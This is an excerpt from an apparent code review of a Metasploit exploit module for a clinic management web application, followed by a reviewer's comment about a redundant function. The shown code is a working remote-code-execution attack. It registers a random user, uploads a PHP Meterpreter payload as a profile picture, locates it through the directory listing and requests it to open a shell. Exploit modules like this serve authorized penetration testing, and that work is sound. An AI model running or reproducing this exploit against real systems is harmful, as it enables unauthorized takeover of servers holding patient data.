modules/exploits/multi/http/clinic_pms_fileupload_rce.rb

```diff
@@ -0,0 +1,249 @@
+    })
+
+    fail_with(Failure::UnexpectedReply, 'Failed to execute OS detection script') unless res && res.code == 200 && !res.body.nil?
+    detected_os = res.body.strip.downcase
+    vprint_status("Detected OS: #{detected_os}")
+
+    # Step 4: Choose payload based on OS
+    if detected_os.include?('win')
+      payload_content = get_write_exec_payload
+      print_status('Target is Windows. Using standard PHP Meterpreter payload.')
+    else
+      payload_content = get_write_exec_payload(unlink_self: true)
+      print_status('Target is Linux/Unix. Using PHP Meterpreter payload with unlink_self.')
+    end
+
+    # Step 5: Upload the payload
+    random_user = Rex::Text.rand_text_alphanumeric(8)
+    random_password = Rex::Text.rand_text_alphanumeric(12)
+    payload_filename = "#{Rex::Text.rand_text_alphanumeric(8)}.php"
+    print_status("Uploading PHP Meterpreter payload as #{payload_filename}...")
+
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(random_user, nil, nil, 'form-data; name="display_name"')
+    post_data.add_part(random_user, nil, nil, 'form-data; name="user_name"')
+    post_data.add_part(random_password, nil, nil, 'form-data; name="password"')
+    post_data.add_part(payload_content, 'application/x-php', nil, "form-data; name=\"profile_picture\"; filename=\"#{payload_filename}\"")
+    post_data.add_part('', nil, nil, 'form-data; name="save_user"')
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'users.php'),
+      'method' => 'POST',
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'data' => post_data.to_s
+    })
+
+    fail_with(Failure::UnexpectedReply, 'Failed to upload PHP payload') unless res && res.code == 302
+    print_good('Payload uploaded successfully!')
+    register_file_for_cleanup(actual_detection_filename, payload_filename) if datastore['DELETE_FILES']
+    payload_filename
+  end
+
+  def fetch_uploaded_filename
+    vprint_status('Retrieving directory listing from /pms/user_images...')
+    sleep datastore['LISTING_DELAY'] # Allow time for the file to be saved on the server
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'user_images/'),
+      'method' => 'GET'
+    })
+
+    fail_with(Failure::UnexpectedReply, 'Failed to retrieve directory listing') unless res && res.code == 200
+
+    # Search for the uploaded filename
+    match = res.body&.match(/href="(\d+#{Regexp.escape(@uploaded_filename)})"/)
+    fail_with(Failure::NotFound, 'Uploaded file not found in directory listing') if match.nil?
+    match[1]
+  end
+
+  def execute_shell(uploaded_file)
+    shell_url = normalize_uri(target_uri.path, 'user_images', uploaded_file)
+    print_status("Executing the uploaded shell at #{shell_url}...")
+    send_request_raw({
+      'uri' => shell_url,
+      'method' => 'GET'
+    })
+  end
+
+  def exploit
+    @uploaded_filename = upload_shell
+    final_filename = fetch_uploaded_filename
```

Comment:
Not really sure why is this function here, could code perform check for web shell presence already in `upload_shell`? And then just returns the filename or path?